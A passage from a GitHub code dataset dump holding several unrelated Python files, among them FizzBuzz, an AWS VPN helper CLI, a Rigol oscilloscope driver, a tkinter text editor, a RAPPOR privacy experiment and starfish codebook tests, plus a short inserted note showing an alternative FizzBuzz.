5\n    if (num in x) and (num in y):\n        print('fizzbuzz')\n        return\n    # Print value if none of the above apply\n    else:\n        print(num)\n        return\n\n# Create a list of 1 - 100.\ndef create_list():\n    list_to_use = []\n    # Create a list from 0 - 100\n    for i in range(101):\n        # Build list.\n        list_to_use.append(i)\n    # Remove first value, a '0'\n    list_to_use.pop(0)\n    # Return list of 1 - 100\n    return list_to_use\n\n# Program.\ndef main():\n    # Build the global multiples lists that fizzbuzz() checks against.\n    global x, y\n    x, y = multiples()\n    # Get list of numbers ranging from 1 - 100.\n    numbers = create_list()\n    # Iterate through the list and FizzBuzz each value.\n    for n in numbers:\n        fizzbuzz(n)\n    return\n\n
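The membership-list approach above works once the global x and y lists exist, but the standard arithmetic check needs no precomputed lists at all. An equivalent one-function sketch using modulo — an alternative illustration, not part of the original record:

    def fizzbuzz_mod(num):
        # num % 15 == 0 catches multiples of both 3 and 5
        if num % 15 == 0:
            print('fizzbuzz')
        elif num % 3 == 0:
            print('fizz')
        elif num % 5 == 0:
            print('buzz')
        else:
            print(num)

    for n in range(1, 101):
        fizzbuzz_mod(n)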
# Run Program.\nif __name__ == '__main__':\n    main()\n","repo_name":"willinbeantown/thingsToShare","sub_path":"my_fizzbuzz/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"11618971623","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom .helper import EndPointManager\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='AWS Client VPN EndPoint Manager')\n    parser.add_argument('config_section', help='A section name from ~/.aws-vpn.cfg')\n    parser.add_argument('action', choices=['up', 'down'], help='The action to take on the endpoint')\n    parser.add_argument('--profile', help='The AWS profile')\n    _args = parser.parse_args()\n    if _args.action == 'up':\n        EndPointManager(_args).bring_up()\n    elif _args.action == 'down':\n        EndPointManager(_args).bring_down()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jingxue/aws-vpn-helper","sub_path":"aws_vpn_helper/bring.py","file_name":"bring.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"19171383499","text":"N = int(input())\r\n\r\n# S[k] is the length of the Moo string at level k: S(0) = 3, S(k) = 2*S(k-1) + k + 3\r\ncount = 3\r\nlevel = 0\r\nS = [3]\r\nwhile count < N:\r\n    level += 1\r\n    count += level + 3 + count\r\n    S.append(count)\r\n    \r\n# Walk down the levels: left copy, middle block of L+3 chars ('m' then L+2 'o's), right copy\r\ndef Search(L):\r\n    global count\r\n    global N\r\n    \r\n    if L == 0:\r\n        return\r\n    \r\n    a = N - S[L-1]\r\n    if a <= 0:\r\n        return Search(L-1)\r\n    elif 1 <= a <= L+3:\r\n        N = a\r\n        return\r\n    else:\r\n        N -= S[L-1] + L+3\r\n        return Search(L-1)\r\n    \r\nSearch(level)\r\n\r\nif N == 1:\r\n    print(\"m\")\r\nelse:\r\n    print(\"o\")","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/5904. Moo 게임/Moo 게임.py","file_name":"Moo 게임.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"14709448126","text":"from random import choice\n\nfrom skytemple_files.common.types.file_types import FileType\nfrom skytemple_files.data.md.protocol import MdProtocol, IQGroup, PokeType, Ability\nfrom skytemple_randomizer.randomizer.abstract import AbstractRandomizer\nfrom skytemple_randomizer.status import Status\n\nVALID_IQ_GROUPS = [\n    IQGroup.A, IQGroup.B, IQGroup.C, IQGroup.D, IQGroup.E, IQGroup.F,\n    IQGroup.G, IQGroup.H, IQGroup.I, IQGroup.J\n]\nVALID_FIRST_TYPE = [\n    PokeType.NORMAL, PokeType.FIRE, PokeType.WATER, PokeType.GRASS,\n    PokeType.ELECTRIC, PokeType.ICE, PokeType.FIGHTING, PokeType.POISON,\n    PokeType.GROUND, PokeType.FLYING, PokeType.PSYCHIC, PokeType.BUG, PokeType.ROCK,\n    PokeType.GHOST, PokeType.DRAGON, PokeType.DARK, PokeType.STEEL\n]\nVALID_SECOND_TYPE = VALID_FIRST_TYPE + [PokeType.NONE]\n\n\nclass MonsterRandomizer(AbstractRandomizer):\n    def step_count(self) -> int:\n        if self._has_something_to_randomize():\n            return 1\n        return 0\n\n    def run(self, status: Status):\n        if not self._has_something_to_randomize():\n            return status.done()\n        status.step(\"Randomizing Pokémon data...\")\n        md: MdProtocol = FileType.MD.deserialize(self.rom.getFileByName('BALANCE/monster.md'))\n        num_entities = FileType.MD.properties().num_entities\n        for midx in range(0, num_entities):\n            if len(md.entries) <= midx + num_entities:\n                continue\n            base_entry = md.entries[midx]\n            secn_entry = md.entries[midx + num_entities]\n            if self.config['pokemon']['iq_groups']:\n                group = choice(VALID_IQ_GROUPS)\n                base_entry.iq_group = group.value\n                secn_entry.iq_group = group.value\n\n            if 
self.config['pokemon']['typings']:\n type1 = choice(VALID_FIRST_TYPE)\n type2 = choice(VALID_SECOND_TYPE)\n while type1 == type2:\n type2 = choice(VALID_SECOND_TYPE)\n base_entry.type_primary = type1.value\n secn_entry.type_primary = type1.value\n base_entry.type_secondary = type2.value\n secn_entry.type_secondary = type2.value\n\n if self.config['pokemon']['abilities']:\n ability_ids = self.config['pokemon']['abilities_enabled'] + [Ability.NONE.value]\n if len(ability_ids) > 0:\n ability1 = Ability(choice(ability_ids))\n ability2 = Ability(choice(ability_ids))\n while ability2 == ability1:\n ability2 = Ability(choice(ability_ids))\n base_entry.ability_primary = ability1.value\n base_entry.ability_secondary = ability2.value\n secn_entry.ability_primary = ability1.value\n secn_entry.ability_secondary = ability2.value\n\n self.rom.setFileByName('BALANCE/monster.md', FileType.MD.serialize(md))\n\n status.done()\n\n def _has_something_to_randomize(self):\n return self.config['pokemon']['iq_groups'] or \\\n self.config['pokemon']['typings'] or \\\n self.config['pokemon']['abilities']\n","repo_name":"SkyTemple/skytemple-randomizer","sub_path":"skytemple_randomizer/randomizer/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"33118054339","text":"#!/usr/bin/python\n\nimport csv, numpy\nfrom pylab import *\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef compareScatter(file1,keycol1,valcol1,file2,keycol2,valcol2,file3,keycol3,valcol3):\n\treader=csv.reader(file(\"./Datasets/\"+file1))\n\theaderRow=reader.next()\n\ta_file1=numpy.array(list(reader))\n\t\n\treader=csv.reader(file(\"./Datasets/\"+file2))\n\theaderRow=reader.next()\n\ta_file2=numpy.array(list(reader))\n\t\n\treader=csv.reader(file(\"./Datasets/\"+file3))\n\theaderRow=reader.next()\n\ta_file3=numpy.array(list(reader))\n\t\n\ta_file1_slice=a_file1[:,keycol1-1],a_file1[:,valcol1-1]\n\ta_file2_slice=a_file2[:,keycol2-1],a_file2[:,valcol2-1]\n\ta_file3_slice=a_file3[:,keycol3-1],a_file3[:,valcol3-1]\n\t\n\td_file1=dict(zip(*a_file1_slice))\n\td_file2=dict(zip(*a_file2_slice))\n\td_file3=dict(zip(*a_file3_slice))\n\t\n\ta_joined=numpy.array([(k,d_file1.get(k),d_file2.get(k),d_file3.get(k))\n\t for k in set(d_file1.iterkeys()).union(d_file2.iterkeys()).union(d_file3.iterkeys())])\n\t\n\t\n\tx=map(float,a_joined[:,1])\n\ty=map(float,a_joined[:,2])\n\tz=map(float,a_joined[:,3])\n\t\n\treturn x,y,z\n\n\na_education,a_employment,a_health=compareScatter(\"education2010.csv\",1,6,\"employment2010.csv\",1,6,\"health2010.csv\",1,6)\n\nax=subplot(221)\nax.scatter(a_education,a_employment,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_title(\"Education vs employment\")\nax.set_xlabel(\"Education\")\nax.set_ylabel(\"Employment\")\n\nax=subplot(222)\nax.scatter(a_education,a_health,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_title(\"Education vs health\")\nax.set_xlabel(\"Education\")\nax.set_ylabel(\"Health\")\n\nax=subplot(223)\nax.scatter(a_employment,a_health,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_title(\"Employment vs health\")\nax.set_xlabel(\"Employment\")\nax.set_ylabel(\"Health\")\n\nax=subplot(224,projection='3d')\nax.scatter(a_education,a_employment,a_health,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_zticklabels([])\nax.set_title(\"Employment vs education vs 
health\")\nax.set_xlabel(\"Education\")\nax.set_ylabel(\"Employment\")\nax.set_zlabel(\"Health\")\n\t\nshow()\n\n\n\n","repo_name":"markheseltine/openknowledge","sub_path":"OpenDataDay2013/scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"36327119426","text":"import testgear.base_classes as base\nimport numpy as np\nimport time\n\nclass DS2072(base.scope):\n    def init(self):\n        self.idstr = self.query(\"*IDN?\").strip()\n\n\n    def set_time_date(self):\n        pass\n\n\n    def opc(self):\n        while True:\n            if self.query(\"*OPC?\").strip() == \"1\":\n                break\n\n\n    def screenshot(self, filename=None):\n        if filename is None:\n            filename = time.strftime(\"%Y%m%d-%H%M%S\")+\"_DS2000.bmp\"\n\n        self.write(\":DISPlay:DATA?\")\n        img = self.resource.read_raw()\n        newFile = open(filename, \"wb\")\n        newFile.write(img[11:-1])\n        newFile.close()\n\n\n    def run(self):\n        self.write(\":RUN\")\n\n\n    def stop(self):\n        self.write(\":STOP\")\n\n    \n    def single(self, wait=True, forced=False):\n        self.write(\":SINGle\")\n        self.opc()\n        if forced:\n            self.force_trigger()\n\n        if wait:\n            while True:\n                if self.query(\":TRIGger:STATus?\").strip() == \"STOP\":\n                    break\n\n        self.opc()\n    \n\n    def force_trigger(self):\n        self.write(\":TFORce\")\n\n\n    def get_waveform_memory(self, channel=1):\n        #use this method to get the whole memory\n        mdepth = int(self.query(\":ACQuire:MDEPth?\"))\n\n        sr = float(self.query(\":ACQuire:SRATe?\"))\n\n        self.write(\":STOP\")\n        self.write(\":WAV:SOUR CHAN{0:d}\".format(channel))\n        self.write(\":WAV:MODE RAW\")\n        self.write(\":WAVeform:POINts {0:d}\".format(mdepth))\n        self.write(\":WAV:RES\")\n        self.write(\":WAV:BEG\")\n\n        sample = []\n\n        while True:\n            status = self.query(\":WAV:STAT?\")\n            print(\"reading data..\")\n            self.write(\":WAV:DATA?\")\n            data = self.resource.read_raw()\n            sample += list(data[11:-1])\n            print(len(sample))\n            \n            if status[0] == 'I':\n                self.write(\":WAV:END\")\n                break\n\n        yinc = float(self.query(\":WAVeform:YINCrement?\"))\n        yorig = float(self.query(\":WAVeform:YORigin?\"))\n        yref = float(self.query(\":WAVeform:YREFerence?\"))\n\n        xorig = float(self.query(\":WAVeform:XORigin?\"))\n\n        s = (np.array(sample) - yref - yorig)*yinc\n        t = np.linspace(0, (mdepth-1)*1/sr, num=mdepth) + xorig\n\n        return t, s\n\n\n    def get_waveform(self, channel=1):\n        #returns the datapoints from screen\n        self.write(\":WAVeform:SOURce CHAN{0:d}\".format(channel))\n        self.write(\":WAV:MODE NORM\")\n        self.write(\":WAVeform:FORMat BYTE\")\n        \n        self.write(\":WAVeform:DATA?\")\n        samples = int(self.resource.read_bytes(11)[7:])\n        data = self.resource.read_bytes(samples)\n\n        xinc = float(self.query(\":WAVeform:XINCrement?\"))\n        xorig = float(self.query(\":WAVeform:XORigin?\"))\n\n        yinc = float(self.query(\":WAVeform:YINCrement?\"))\n        yorig = float(self.query(\":WAVeform:YORigin?\"))\n        yref = float(self.query(\":WAVeform:YREFerence?\"))\n\n        s = (np.array(list(data)) - yref - yorig)*yinc \n        t = np.linspace(0, (len(s)-1)*xinc, num=len(s)) + xorig\n\n        return t, s\n\n\n    def null_offset(self, channel=1):\n        vmax = float(self.query(\":MEASure:VMAX? CHANnel{0:d}\".format(channel)))\n        vmin = float(self.query(\":MEASure:VMIN? CHANnel{0:d}\".format(channel)))
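Both waveform readers above apply the same affine conversion from raw 8-bit samples to volts: s = (raw - yref - yorig) * yinc. A worked example with made-up preamble values — illustrative only, not queried from a real instrument:

    import numpy as np

    raw = np.array([127, 130, 125])        # hypothetical bytes from :WAV:DATA?
    yref, yorig, yinc = 127.0, 0.0, 0.02   # assumed YREFerence / YORigin / YINCrement
    volts = (raw - yref - yorig) * yinc
    print(volts)  # [ 0.    0.06 -0.04] -> sample 130 sits 60 mV above the reference level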
\n\n        if vmin+vmax > 1e9:\n            return False\n\n        self.write(\":CHANnel{0:d}:OFFSet {1:0.6f}\".format(channel, -1*np.mean([vmax, vmin]) ) )\n        \n        return True\n\n\n    def autoscale(self, channel=1):\n        #ToDo: check probe factor\n        self.write(\":CHANnel{0:d}:DISPlay 1\".format(channel))\n        self.opc()\n        probe = float(self.query(\":CHANnel{0:d}:PROBe?\".format(channel)))\n        self.single(forced=True)\n\n        if float(self.query(\":MEASure:VMAX?\")) > 1e30:\n            #print(\"out of range\")\n            self.write(\":CHANnel{0:d}:SCALe {1:0.6f}\".format(channel, 10 ))\n            self.write(\":CHANnel{0:d}:OFFSet {1:0.6f}\".format(channel, 0 ))\n            self.opc()\n            self.single(forced=True)\n            time.sleep(1)\n        \n        while True:\n            scale = float(self.query(\":CHANnel{0:d}:SCALe?\".format(channel)))\n            vmax = float(self.query(\":MEASure:VMAX? CHANnel{0:d}\".format(channel)))\n            vmin = float(self.query(\":MEASure:VMIN? CHANnel{0:d}\".format(channel)))\n            span = vmax - vmin\n            \n            if (span * 2 / scale / 8) > 0.2:\n                #print(\"adjusting offset\")\n                self.write(\":CHANnel{0:d}:OFFSet {1:0.6f}\".format(channel, -1*np.mean([vmax, vmin]) ) )\n                \n                #print(vmin + span/2)\n\n            if (span * 2 / scale / 8) > 0.6:\n                #print(\"set fine\")\n                self.write(\":CHANnel{0:d}:SCALe {1:0.6f}\".format(channel, span / (8 * 0.8) ))\n                break\n\n            if scale <= (500e-6 * probe):\n                #print(\"limit reached\")\n                break\n            \n            self.write(\":CHANnel{0:d}:SCALe {1:0.6f}\".format(channel, scale/2 ))\n            self.single(forced=True)\n            \n            time.sleep(1)\n        \n        self.null_offset(channel)","repo_name":"PhilippCo/testgear","sub_path":"testgear/Rigol/DS2072.py","file_name":"DS2072.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} {"seq_id":"36363224611","text":"from tkinter import *\r\nimport pyautogui\r\nfrom tkinter.filedialog import asksaveasfile\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom tkinter import ttk\r\nimport re\r\nfrom tkinter import filedialog\r\nimport os\r\nfrom io import StringIO\r\nimport sys\r\n\r\ntext_boxes = []\r\ntabs_list = []\r\n\r\n\r\n#data\r\nkeywords = ['False', 'None', 'True', 'and', 'as', 'assert', 'async', 'await', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return', 'try', 'while', 'with', 'yield']\r\nbuiltins = ['__build_class__', '__import__', 'abs', 'all', 'any', 'ascii', 'bin', 'breakpoint', 'callable', 'chr', 'compile', 'delattr', 'dir', 'divmod', 'eval', 'exec', 'format', 'getattr', 'globals', 'hasattr', 'hash', 'hex', 'id', 'input', 'isinstance', 'issubclass', 'iter', 'len', 'locals', 'max', 'min', 'next', 'oct', 'ord', 'pow', 'print', 'repr', 'round', 'setattr', 'sorted', 'sum', 'vars', 'open']\r\ndefinitions = []\r\n\r\ndef run_code(event):\r\n\r\n    code = text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END)\r\n\r\n    old_stdout = sys.stdout\r\n    sys.stdout = mystdout = StringIO()\r\n\r\n    exec(code)\r\n\r\n    sys.stdout = old_stdout\r\n\r\n    message = mystdout.getvalue()\r\n\r\n    output = Text(win)\r\n\r\n    output.insert(\"1.0\", message)\r\n\r\n    output.pack()\r\n\r\n\r\n    print(message)\r\n\r\ndef open_selected_file(event):\r\n    \r\n    filename = files_list[tree.index(tree.curselection()) - 1]\r\n\r\n    filepath = path_list[tree.index(tree.curselection()) - 1]\r\n\r\n    add_tab(filename)\r\n\r\n    text_bar = Scrollbar(tabs_list[-1]) \r\n    \r\n    text_bar.pack(side = RIGHT, fill = Y)\r\n\r\n    \r\n\r\n    
text_boxes.append(Text(tabs_list[-1], undo=True, maxundo=-1, autoseparators=True, yscrollcommand = text_bar.set))\r\n\r\n \r\n\r\n text_binds()\r\n\r\n text_boxes[-1].pack(fill = BOTH, expand = True)\r\n\r\n text_bar.config(command = text_boxes[-1].yview)\r\n\r\n try:\r\n read_file = open(filepath, \"rb\")\r\n except PermissionError:\r\n return\r\n\r\n text_boxes[-1].insert(\"1.0\", read_file.read())\r\n\r\n\r\n \r\n\r\n read_file.close()\r\n\r\n\r\ndef open_tree():\r\n\r\n\r\n\r\n global files_list, path_list\r\n\r\n files_list = []\r\n path_list = []\r\n\r\n count = 1\r\n\r\n tree.insert(1, \"Loading your project folder\")\r\n\r\n tree.insert(2, \"please wait...\")\r\n \r\n startpath = filedialog.askdirectory()\r\n\r\n\r\n\r\n \r\n\r\n\r\n for root, dirs, files in os.walk(startpath):\r\n level = root.replace(startpath, '').count(os.sep)\r\n indent = ' ' * 4 * (level)\r\n\r\n tree.insert(count, '{}{}/'.format(indent, \"📁\" + os.path.basename(root)))\r\n \r\n files_list.append(os.path.basename(root))\r\n\r\n path_list.append(root)\r\n \r\n subindent = ' ' * 4 * (level + 1)\r\n\r\n count += 1\r\n\r\n \r\n for f in files:\r\n tree.insert(count, \"{}{}\".format(subindent, f))\r\n \r\n files_list.append(f)\r\n path_list.append(root + \"/\" + f)\r\n\r\n count += 1\r\n\r\n\r\ndef highlighting_syntax(code):\r\n #print(\"hi\")\r\n #keywords\r\n #builtins\r\n #comments\r\n #strings\r\n #definitions\r\n\r\n #pattern = re.compile(\"\")\r\n\r\n #print(re.search(pattern, code))\r\n\r\n code.find(\"#\")\r\n \r\n \r\n \r\n\r\ndef delete_tab(event):\r\n if len(tabs_list) == 1:\r\n win.destroy()\r\n tabControl.forget(tabControl.select())\r\n\r\ndef delete_line(event):\r\n pos = text_boxes[tabControl.index(tabControl.select())].index(CURRENT)\r\n coors = pos.split(\".\")\r\n text_boxes[tabControl.index(tabControl.select())].delete(coors[0] + \".0\", coors[0] + \".100\")\r\n\r\ndef save():\r\n\r\n selected_tab = tabControl.tab(tabControl.select(), \"text\")\r\n\r\n if selected_tab == \"Untitled\":\r\n save_as()\r\n return\r\n \r\n win.title(selected_tab)\r\n \r\n write_file = open(selected_tab, \"w\")\r\n\r\n write_file.write(text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END))\r\n\r\n write_file.close()\r\n text_boxes[tabControl.index(tabControl.select())].edit_modified(False)\r\n\r\ndef save_shortcut(event):\r\n\r\n selected_tab = tabControl.tab(tabControl.select(), \"text\")\r\n\r\n if selected_tab == \"Untitled\":\r\n save_as()\r\n return\r\n \r\n win.title(selected_tab)\r\n \r\n write_file = open(selected_tab, \"w\")\r\n\r\n write_file.write(text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END))\r\n\r\n write_file.close()\r\n text_boxes[tabControl.index(tabControl.select())].edit_modified(False)\r\n\r\n\r\ndef changes_made(event):\r\n #print(\"hi\")\r\n #print(text_boxes[tabControl.index(tabControl.select())].edit_modified())\r\n\r\n print(event.char)\r\n\r\n if event.char == \".\":\r\n Listbox(text_boxes[tabControl.index(tabControl.select())]).pack(pady=25, padx=25)\r\n \r\n if text_boxes[tabControl.index(tabControl.select())].edit_modified() != 0:\r\n win.title(\"*\" + tabControl.tab(tabControl.select(), \"text\"))\r\n code = text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END)\r\n highlighting_syntax(code)\r\n\r\ndef change_tab(event):\r\n selected_tab = tabControl.tab(tabControl.select(), \"text\")\r\n\r\n print(selected_tab)\r\n win.title(selected_tab)\r\n\r\ndef text_binds():\r\n #text_boxes[tabControl.index(tabControl.select())]\r\n 
text_boxes[-1].bind(\"<Control-g>\", command_prompt)  #keyboard shortcuts: Ctrl+G go to coordinate, Ctrl+S save, Ctrl+D delete line, Ctrl+W close tab, F5 run\r\n    #text_boxes[tabControl.index(tabControl.select())].bind(\"<<Modified>>\", changes_made)\r\n    text_boxes[-1].bind(\"<Key>\", changes_made)\r\n    #text_boxes[tabControl.index(tabControl.select())].bind(\"s\", undo)\r\n    text_boxes[-1].bind(\"<Control-s>\", save_shortcut)\r\n    \r\n    text_boxes[-1].bind(\"<Control-d>\", delete_line)\r\n\r\n    text_boxes[-1].bind(\"<Control-w>\", delete_tab)\r\n\r\n    text_boxes[-1].bind(\"<F5>\", run_code)\r\n\r\n\r\n    \r\n    \r\n\r\ndef new_file():\r\n    global text_box\r\n    add_tab(\"Untitled\")\r\n\r\n    text_bar = Scrollbar(tabs_list[-1]) \r\n    \r\n    text_bar.pack(side = RIGHT, fill = Y)\r\n    \r\n    text_boxes.append(Text(tabs_list[-1], undo=True, maxundo=-1, autoseparators=True, yscrollcommand = text_bar.set))\r\n\r\n    text_binds()\r\n\r\n    text_boxes[-1].pack(fill = BOTH, expand = True)\r\n\r\n\r\n    text_bar.config(command = text_boxes[-1].yview)\r\n\r\ndef tabs():\r\n    global tabControl\r\n    #style = ttk.Style()\r\n    #ttk.Style().configure(\"TButton\", padding=6, relief=\"flat\", background=\"#ccc\")\r\n    tabControl = ttk.Notebook(win)\r\n    tabControl.bind(\"<<NotebookTabChanged>>\", change_tab)\r\n    tabControl.bind(\"<Control-w>\", delete_tab)\r\n    tabControl.pack(fill = BOTH, expand = True)\r\n\r\n\r\ndef add_tab(tab_name):\r\n    global tab\r\n    tabs_list.append(ttk.Frame(tabControl))\r\n    tabControl.add(tabs_list[-1], text=tab_name)\r\n    \r\n    \r\n\r\n\r\ndef open_file():\r\n    #global text_box\r\n    filename = askopenfilename()\r\n    file_content = open(filename, \"rb\")\r\n    add_tab(filename)\r\n\r\n    text_bar = Scrollbar(tabs_list[-1]) \r\n    \r\n    text_bar.pack(side = RIGHT, fill = Y)\r\n    \r\n    \r\n    text_boxes.append(Text(tabs_list[-1], undo=True, maxundo=-1, autoseparators=True, yscrollcommand = text_bar.set))\r\n\r\n    text_binds()\r\n\r\n    text_boxes[-1].pack(fill = BOTH, expand = True)\r\n\r\n    text_boxes[-1].insert(\"1.0\", file_content.read())\r\n\r\n    text_bar.config(command = text_boxes[-1].yview)\r\n\r\n\r\ndef save_as():\r\n    files = [('All Files', '*.*'), \r\n             ('Python Files', '*.py'), \r\n             ('Text Document', '*.txt')] \r\n    file_saved = asksaveasfile(filetypes = files, defaultextension = files)\r\n    if file_saved is None:\r\n        return\r\n    file_saved.write(text_boxes[tabControl.index(tabControl.select())].get(\"1.0\", END))\r\n    file_saved.close()\r\n\r\ndef menus():\r\n    menu = Menu(win)\r\n    win.config(menu=menu)\r\n    fileMenu = Menu(menu)\r\n    menu.add_cascade(label=\"File\", menu=fileMenu)\r\n    fileMenu.add_command(label=\"New\", command=new_file)\r\n    fileMenu.add_command(label=\"Save as\", command=save_as)\r\n    fileMenu.add_command(label=\"Save\", command=save)\r\n    fileMenu.add_command(label=\"Open\", command=open_file)\r\n    fileMenu.add_separator()\r\n\r\ndef command_prompt(event):\r\n    command = pyautogui.prompt(text='Line Column', title='Coordinate to go to' , default='0 0')\r\n    line = int(command.split(\" \")[0])\r\n    column = int(command.split(\" \")[1])\r\n    text_boxes[tabControl.index(tabControl.select())].mark_set(\"insert\", \"%d.%d\" % (line, column))\r\n    text_boxes[tabControl.index(tabControl.select())].see(str(line) + \".\" + str(column))\r\nwin = Tk()\r\n\r\nwin.wm_iconbitmap('imgs/logo.ico')\r\n\r\nwin.title(\"Mline\")\r\n\r\n\r\n\r\nopen_project = Button(win, text=\"Open project\", command=open_tree)\r\n\r\nopen_project.pack(side = TOP)\r\n\r\n \r\ntree_bar = Scrollbar(win) \r\n    \r\ntree_bar.pack(side = LEFT, fill = Y)\r\n\r\ntree = Listbox(win, width=25, yscrollcommand = tree_bar.set)\r\n\r\n\r\ntree.bind('<<ListboxSelect>>', open_selected_file)\r\n\r\ntree.pack(side = LEFT, fill = BOTH)\r\n\r\ntree_bar.config( command = tree.yview )
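command_prompt above drives the cursor with Tk's text indices, which are "line.column" strings (lines start at 1, columns at 0). A tiny self-contained illustration of the same mark_set/see calls — a hypothetical snippet separate from the editor above, and it needs a display to run:

    from tkinter import Tk, Text

    root = Tk()
    t = Text(root)
    t.insert("1.0", "first line\nsecond line\n")
    t.mark_set("insert", "%d.%d" % (2, 3))  # move the cursor to line 2, column 3
    t.see("2.3")                            # scroll until that index is visible
    print(t.index("insert"))                # -> 2.3
    root.destroy()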
\r\n\r\ntabs()\r\n\r\nmenus()\r\n\r\n\r\n\r\nwin.mainloop()\r\n","repo_name":"maxikichka/Max-Lines","sub_path":"maxLines 1.0/text_editor.py","file_name":"text_editor.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"7497049648","text":"\"\"\"\n@author:FZX\n@file:RP.py\n@time:2019/12/11 15:45\n\"\"\"\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport LDP.basicDP.RPbasic as rpb\nimport LDP.basicFunction.basicfunc as bf\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# disable scientific-notation printing\nnp.set_printoptions(suppress=True)\n\n\"\"\"\nReproduce the RAPPOR method for the single-value setting, i.e. each user holds one value\n\"\"\"\n\npath = '../LDPMiner/dataset/kosarak/kosarak_10k_singlevalue.csv'\nuser_data = bf.readcsv(path)\nprint('data:\\n', user_data)\n\nmax = np.max(user_data)  # maximum of the 1-D data\nmin = np.min(user_data)  # minimum of the 1-D data\nn = len(user_data)  # number of users n\nd = max - min + 1  # dimension d of the user data domain\nprint('n=', n, '\\nd=', d)\nlabel = np.unique(user_data)\nx_list = label.tolist()\n\n# one-hot encoding\nonehot_data = bf.one_hot_1D(user_data)\n# np.savetxt('../LDPMiner/dataset/SH/kosarak_10k_singlevalue_onehot.txt',onehot_data,fmt='%d')\n# print('one-hot encoded data:\\n', onehot_data)\n\n\n# compute the true count of each item, used for plotting\norigin = np.zeros(d)\nfor i in range(n):\n    origin = origin + onehot_data[i]\n#print('origin:\\n', origin)\ncount_true = origin.tolist()\nprint(count_true)\n\n\"\"\"\nBasic One-time RAPPOR\nThe data is already encoded, and PRR (permanent randomized response) is applied only once\n\"\"\"\nepsilon = 2  # the larger eps is, the better the utility and the weaker the privacy\nf = rpb.gen_f(epsilon)\n\nz_total = np.zeros(d)\nfor i in range(n):\n    z = rpb.PRR_bits(onehot_data[i], f)\n    z_total = z_total + z\nprint(z_total)\n\nest = np.zeros(d)\nfor j in range(d):\n    est[j] = rpb.decoder_PRR(z_total[j], n, f)\nprint('estimate:\\n', est)\ncount_estimate = est.tolist()\n\n# plot true vs. estimated counts\nplt.bar(x_list, +origin)\nplt.bar(x_list, -est)\nplt.show()\n\nresult = {\"RAPPOR\": count_estimate, \"true\": count_true, \"value\": x_list}\ndf_res = pd.DataFrame(result)\n#df_res.to_csv(\"../LDPMiner/dataset/kosarak/result/10k_sv_RP.csv\",index=False)","repo_name":"MicroFANs/DifferentialPrivacywork","sub_path":"LDP/LDPMiner/RP.py","file_name":"RP.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} {"seq_id":"18040313654","text":"\"\"\"\nTests for codebook.metric_decode method\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom starfish import IntensityTable\nfrom starfish.core.types import Axes, Features, SpotAttributes\nfrom ..codebook import Codebook\n\n\ndef intensity_table_factory(data: np.ndarray=np.array([[[0, 3], [4, 0]]])) -> IntensityTable:\n    \"\"\"\n    Produces an IntensityTable with a single feature that was measured over 2 channels and 2 rounds.\n    \"\"\"\n\n    # generates spot attributes equal in size to the number of passed features.\n    # each attribute has coordinates (z, y, x) equal to the feature index, and radius 1.\n    spot_attributes_data = pd.DataFrame(\n        data=np.array([[i, i, i, 1] for i in np.arange(data.shape[0])]),\n        columns=[Axes.ZPLANE, Axes.Y, Axes.X, Features.SPOT_RADIUS]\n    )\n\n    intensity_table = IntensityTable.from_spot_data(\n        data,\n        SpotAttributes(spot_attributes_data),\n        ch_values=np.arange(data.shape[1]),\n        round_values=np.arange(data.shape[2]),\n    )\n    return intensity_table\n\n\ndef codebook_factory() -> Codebook:\n    \"\"\"\n    Codebook with two codewords describing an experiment with two channels and two imaging rounds.\n    Both codes have two \"on\" channels.\n    \"\"\"
